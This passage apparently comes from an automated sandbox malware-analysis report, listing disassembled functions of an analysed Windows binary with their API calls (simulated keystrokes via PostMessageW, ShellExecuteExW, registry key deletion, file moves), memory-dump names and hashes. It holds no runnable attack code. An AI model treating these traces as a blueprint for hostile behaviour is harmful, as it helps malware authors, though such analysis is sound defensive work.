                                                                                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00AF8DB9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3864802216-0
                                                                                                                                                        • Opcode ID: 7186cd303ef2f8756aa83f7f16c9e1e4ebaab15bc2a5ed0b4b38c93cf91738bf
                                                                                                                                                        • Instruction ID: e3b1133dbd3f807fe67193caeca3fffec1096b70861e54c0625f0b30f17257ba
                                                                                                                                                        • Opcode Fuzzy Hash: 7186cd303ef2f8756aa83f7f16c9e1e4ebaab15bc2a5ed0b4b38c93cf91738bf
                                                                                                                                                        • Instruction Fuzzy Hash: 01314C72201614BFEB118F51CC8AFEA3BA9EF49755F448065FE08DB191DBB99841CB70
                                                                                                                                                        Function 00AAB40F Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 161f31cb96887c469af790153b399788577f5060dd26984cf45d789fba5a8b26
                                                                                                                                                        • Instruction ID: 38a8f1e90f3ccf52177e5a23a7dfdd86b23a4f672735812fe49906ea3243685d
                                                                                                                                                        • Opcode Fuzzy Hash: 161f31cb96887c469af790153b399788577f5060dd26984cf45d789fba5a8b26
                                                                                                                                                        • Instruction Fuzzy Hash: 70714A7191010AEFCB15CF98CC89ABEBB74FF8A314F148159F916AB292C7359A51CB60
                                                                                                                                                        Function 00AF2121 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00AF214B
                                                                                                                                                        • _memset.LIBCMT ref: 00AF2214
                                                                                                                                                        • ShellExecuteExW.SHELL32(?), ref: 00AF2259
                                                                                                                                                          • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                                                                                                                                                          • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                                                                                                                                                          • Part of subcall function 00A93BCF: _wcscpy.LIBCMT ref: 00A93BF2
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00AF2320
                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00AF232F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                                                        • String ID: @
                                                                                                                                                        • API String ID: 4082843840-2766056989
                                                                                                                                                        • Opcode ID: 0ab0fb280d6634a504345c74df2a669fdbca0e80d54eb4f59551144b46fe2cdf
                                                                                                                                                        • Instruction ID: 13ed0317898eb1f75f63d3160c3c2c0e534ab034551ac66749378a4c5baf9299
                                                                                                                                                        • Opcode Fuzzy Hash: 0ab0fb280d6634a504345c74df2a669fdbca0e80d54eb4f59551144b46fe2cdf
                                                                                                                                                        • Instruction Fuzzy Hash: 94718C71A00619DFCF14EFA8CA81AAEBBF5FF49310F108559E956AB351DB34AD40CB90
                                                                                                                                                        Function 00AD47DE Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetParent.USER32(?), ref: 00AD481D
                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 00AD4832
                                                                                                                                                        • SetKeyboardState.USER32(?), ref: 00AD4893
                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00AD48C1
                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00AD48E0
                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00AD4926
                                                                                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00AD4949
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 87235514-0
                                                                                                                                                        • Opcode ID: 1f1db06a1ccbc2c22d4482b1dcb13582023cca30e80b61b7039ad3203f377cc1
                                                                                                                                                        • Instruction ID: b630f6ee18f342c77eccca71acfecfefb80dc19767a3741c6791c5427aeff23e
                                                                                                                                                        • Opcode Fuzzy Hash: 1f1db06a1ccbc2c22d4482b1dcb13582023cca30e80b61b7039ad3203f377cc1
                                                                                                                                                        • Instruction Fuzzy Hash: A751D4A05087D13EFB364724CC55BBBBFA95B0A304F08858AE1D656AC2C6E4EC84E750
                                                                                                                                                        Function 00AD45F9 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetParent.USER32(00000000), ref: 00AD4638
                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 00AD464D
                                                                                                                                                        • SetKeyboardState.USER32(?), ref: 00AD46AE
                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00AD46DA
                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00AD46F7
                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00AD473B
                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00AD475C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 87235514-0
                                                                                                                                                        • Opcode ID: 06bcccb1f0752f12cefb3930d0eec68951a6c56138384352269274213a1cffe8
                                                                                                                                                        • Instruction ID: 5e78d263225439fdfb6f4a552dea2af533bfdf8dafa6906fabbdd77a0537445d
                                                                                                                                                        • Opcode Fuzzy Hash: 06bcccb1f0752f12cefb3930d0eec68951a6c56138384352269274213a1cffe8
                                                                                                                                                        • Instruction Fuzzy Hash: 9751E8A05047D53FFB3687248C45BBABFA96B0B304F08848AE1E756AC2D7B4EC94D750
                                                                                                                                                        Function 00AD86AE Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcsncpy$LocalTime
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2945705084-0
                                                                                                                                                        • Opcode ID: 0b7d720109e4f3056aa99a49f5f2861a3fa83c9b9f6c5d0e42fe3b2dbd045e28
                                                                                                                                                        • Instruction ID: a538a293f400c2a4ee25122dcbbf366efcb75691f00576c6928077c57ca16e13
                                                                                                                                                        • Opcode Fuzzy Hash: 0b7d720109e4f3056aa99a49f5f2861a3fa83c9b9f6c5d0e42fe3b2dbd045e28
                                                                                                                                                        • Instruction Fuzzy Hash: 63413C65C1021476CB10EBF5C887ACFB7BCAF15350F908867E929F3222EA34E65587E5
                                                                                                                                                        Function 00AF9D97 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00AF9DB0
                                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AF9E57
                                                                                                                                                        • IsMenu.USER32(?), ref: 00AF9E6F
                                                                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AF9EB7
                                                                                                                                                        • DrawMenuBar.USER32 ref: 00AF9ED0
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 3866635326-4108050209
                                                                                                                                                        • Opcode ID: fde4c4aa92efd23cf012f054a5a43fb132de376efe08876ab79b809016f62cd1
                                                                                                                                                        • Instruction ID: 677b27751887ae9b56808dc5113d938baaf532f5ce89a04330ca5d8a39cbab83
                                                                                                                                                        • Opcode Fuzzy Hash: fde4c4aa92efd23cf012f054a5a43fb132de376efe08876ab79b809016f62cd1
                                                                                                                                                        • Instruction Fuzzy Hash: B2410375A00309EFDB20DF94D884BEABBB9FB09354F04846AFA1997251D730AE54CB60
                                                                                                                                                        Function 00AF3C63 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00AF3C92
                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AF3CBC
                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00AF3D71
                                                                                                                                                          • Part of subcall function 00AF3C63: RegCloseKey.ADVAPI32(?), ref: 00AF3CD9
                                                                                                                                                          • Part of subcall function 00AF3C63: FreeLibrary.KERNEL32(?), ref: 00AF3D2B
                                                                                                                                                          • Part of subcall function 00AF3C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00AF3D4E
                                                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00AF3D16
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 395352322-0
                                                                                                                                                        • Opcode ID: a0f0e287cee0192dd12473942746f9c838ac23babf090968aee7d7128a4deb7d
                                                                                                                                                        • Instruction ID: ca39917dd06ba4c82e38f8b87432b28ed112cbd659468d685a1bff407a852298
                                                                                                                                                        • Opcode Fuzzy Hash: a0f0e287cee0192dd12473942746f9c838ac23babf090968aee7d7128a4deb7d
                                                                                                                                                        • Instruction Fuzzy Hash: 46311872900209BFDF159BD4DC89AFEB7BCEF08340F50456AB612A3150DA709F498B60
                                                                                                                                                        Function 00AF8DD5 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00AF8DF4
                                                                                                                                                        • GetWindowLongW.USER32(00DA9668,000000F0), ref: 00AF8E27
                                                                                                                                                        • GetWindowLongW.USER32(00DA9668,000000F0), ref: 00AF8E5C
                                                                                                                                                        • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00AF8E8E
                                                                                                                                                        • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00AF8EB8
                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00AF8EC9
                                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AF8EE3
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LongWindow$MessageSend
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2178440468-0
                                                                                                                                                        • Opcode ID: 51fa828be576f8fd5c14876c7264696d5ff64c82a9638860b1220de7c03c9e06
                                                                                                                                                        • Instruction ID: 68166391e14d37f6a19d07cf422674f135e385bf22bb9994f370b062769ce67b
                                                                                                                                                        • Opcode Fuzzy Hash: 51fa828be576f8fd5c14876c7264696d5ff64c82a9638860b1220de7c03c9e06
                                                                                                                                                        • Instruction Fuzzy Hash: AD311F31600219AFDB20CF98DC89FA53BA5FB4A754F1945A8F6158B2B2CF75EC40DB40
                                                                                                                                                        Function 00AD16F1 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AD1734
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00AD175A
                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00AD175D
                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00AD177B
                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00AD1784
                                                                                                                                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 00AD17A9
                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 00AD17B7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3761583154-0
                                                                                                                                                        • Opcode ID: 815facca88550dced9da5ad48c38da77d2eb6e0947922552e018b27bf7ad34ec
                                                                                                                                                        • Instruction ID: b7556c195dc4d696cadeae6ab2a519c2cd4389e61c60221c7c96ae235d36df34
                                                                                                                                                        • Opcode Fuzzy Hash: 815facca88550dced9da5ad48c38da77d2eb6e0947922552e018b27bf7ad34ec
                                                                                                                                                        • Instruction Fuzzy Hash: 7E216275600219BF9B109BA8DC88CEB77ECEB09360B408526F916DB361DB74EC418B60
                                                                                                                                                        Function 00AD69F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93filestringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00A931DA
                                                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00AD6A2B
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00AD6A49
                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00AD6A62
                                                                                                                                                          • Part of subcall function 00AD6D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00AD6DBA
                                                                                                                                                          • Part of subcall function 00AD6D6D: GetLastError.KERNEL32 ref: 00AD6DC5
                                                                                                                                                          • Part of subcall function 00AD6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00AD6DD9
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AD6AA4
                                                                                                                                                        • SHFileOperationW.SHELL32(?), ref: 00AD6B0C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
